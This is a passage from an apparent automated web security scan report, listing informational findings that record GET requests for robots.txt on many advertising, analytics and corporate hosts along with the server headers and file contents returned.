Severity:   Information
Confidence:   Certain
Host:   http://executivevision.cnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 21:22:02 GMT
Accept-Ranges: bytes
ETag: "079141d6b21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Fri, 02 Sep 2011 02:41:37 GMT
Age: 192
Content-Length: 157

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/msnbc/SitemapIndex.xml

26.48. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.49. http://fonts.googleapis.com/css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:32 GMT
Expires: Tue, 06 Sep 2011 15:32:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.50. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /app/site/crm/externalleadpage.nl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forms.netsuite.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:00 GMT
Server: Apache
Content-Length: 103
Last-Modified: Thu, 25 Aug 2011 22:59:41 GMT
NS_RTIMER_COMPOSITE: -1700478872:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

26.51. https://forums.oracle.com/forums/style/style.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/style/style.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.oracle.com

Response

HTTP/1.0 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Wed, 04 Mar 2009 13:24:21 GMT
ETag: "724018-f4b-49ae8105"
Accept-Ranges: bytes
Content-Length: 3915
Content-Type: text/plain
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: close
X-N: S

#robots.txt for forums.oracle.com
# Last update: 04/18/2006 by Sdureja
User-agent: *
Disallow: /forums/guestsettings!default.jspa
Disallow: /forums/usersettings!default.jspa
Disallow: /forums/login.js
...[SNIP]...

26.52. http://img-cdn.mediaplex.com/0/17353/universal.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /0/17353/universal.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

26.53. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.54. http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597

Summary

Severity:   Information
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "134235-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www287
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.55. http://keywords.fmpub.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://keywords.fmpub.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: keywords.fmpub.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:54 GMT
Server: Apache/2.2
Last-Modified: Thu, 07 Oct 2010 02:57:58 GMT
Accept-Ranges: bytes
Content-Length: 26
X-Server: adserver12.tor.fmpub.net
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.56. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:48 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.57. http://l.apture.com/v3/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.apture.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 27
Date: Tue, 06 Sep 2011 15:33:12 GMT
Connection: close

User-agent: *
Disallow: /

26.58. http://legolas.nexac.com/lgalt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /lgalt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: legolas.nexac.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:37 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:30 GMT
ETag: "c5812d-1b-49f79d2014380"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.59. http://m.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
Last-Modified: Thu, 18 Mar 2010 23:04:19 GMT
ETag: "128030-636-4821b402902c0"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 15:04:46 GMT
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.1 aicache6
Content-Length: 1590
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.60. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/createUser.jspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: myprofile.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
ETag: "1c9cc2a-1a-48898138d56e1"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186750711919769,1)
Last-Modified: Wed, 09 Jun 2010 12:30:51 GMT
Content-Length: 26

User-Agent: *
Disallow: /

26.61. http://netsuite-www.baynote.net/baynote/customerstatus2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/customerstatus2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1315320601000"
Last-Modified: Tue, 06 Sep 2011 14:50:01 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 06 Sep 2011 15:37:54 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

26.62. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

26.63. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11c-1a-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

User-agent: *
Disallow: /

26.64. http://now.eloqua.com/visitor/v200/svrGP.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 19 Aug 2011 17:48:38 GMT
Accept-Ranges: bytes
ETag: "09f8539985ecc1:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

26.65. http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "241115-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www63
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.66. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "e5150-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www285
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.67. http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /b/ss/csccom/1/H.15.1/s04067904318217

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "18c593-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www370
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.68. http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "215158-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www381
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.69. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1b5c9e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www81
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.70. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1c912f-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www383
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.71. https://oracleus.wingateweb.com/portal/newreg.ww

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /portal/newreg.ww

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleus.wingateweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:15 GMT
Server: Apache
Last-Modified: Tue, 28 Mar 2006 18:01:29 GMT
ETag: "e10ba4-1a-41011e167b040"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.72. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:53 GMT
Expires: Wed, 07 Sep 2011 15:00:53 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.73. http://pg.links.channelintelligence.com/pages/CBLJS.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:289d"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:35 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.74. http://pg.links.origin.channelintelligence.com/pages/wl.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pg.links.origin.channelintelligence.com
Path:   /pages/wl.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2501"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.75. http://pi.pardot.com/analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /analytics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:04 GMT
Server: Apache
Last-Modified: Thu, 27 Mar 2008 15:50:33 GMT
ETag: "1a"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:04 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
X-Pardot-LB: lb-d2
Connection: close

#User-agent: *
#Disallow:

26.76. http://pixel.everesttech.net/1688/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /1688/i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051145-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=998861
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

26.77. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.78. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

26.79. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

User-agent: *
Disallow: /

26.80. http://r.casalemedia.com/j.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /j.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

User-agent: *
Disallow: /

26.81. http://rd.rlcdn.com/rd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /rd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

User-Agent: *
Disallow: /

26.82. http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reviews.gillettevenus.com
Path:   /4746/00047400302457/reviews.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 195
Connection: close

Sitemap: http://reviews.gillettevenus.com/sitemapindex.xml.gz

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /

26.83. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:59 GMT
ETag: "70100-1b-4a7926b978ac0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.84. http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rww.readwriteweb.netdna-cdn.com
Path:   /mt-static/themes/df/rww_global.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rww.readwriteweb.netdna-cdn.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Tue, 06 Sep 2011 15:32:47 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 07 Jul 2010 16:50:17 GMT
ETag: "207-48acef6e5e440"
Content-Length: 519
Vary: Accept-Encoding,User-Agent
Accept-Ranges: bytes

# robots.txt for http://www.readwriteweb.com/

User-agent: *
Disallow: /test/
Disallow: /new/
Disallow: /42/
Disallow: /cgi-bin/

User-agent: Googlebot-Image
Disallow: /

User-agent: 008
Disallow: /

...[SNIP]...

26.85. http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /3232241/Russell_Headline_728x90b_REV.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 14:58:10 GMT
Expires: Wed, 07 Sep 2011 14:58:10 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

26.86. http://s7.addthis.com/js/addthis_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/addthis_widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 09 Aug 2011 12:51:11 GMT
ETag: "f0851f-1b-4aa1204a68dc0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:12:49 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.87. http://search.oracle.com/search/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /search/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TG;max-age=0+0;age=0;ecid=195841016765,0)
Content-Length: 63
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 15:54:25 GMT
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=477779860.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

# /robots.txt for search.oracle.com
User-agent: *
Disallow: /

26.88. http://search.twitter.com/search.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:26 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:12:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

26.89. http://services.krxd.net/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: services.krxd.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:57:02 GMT
Last-Modified: Thu, 11 Aug 2011 22:33:52 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger-b007; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:02 GMT
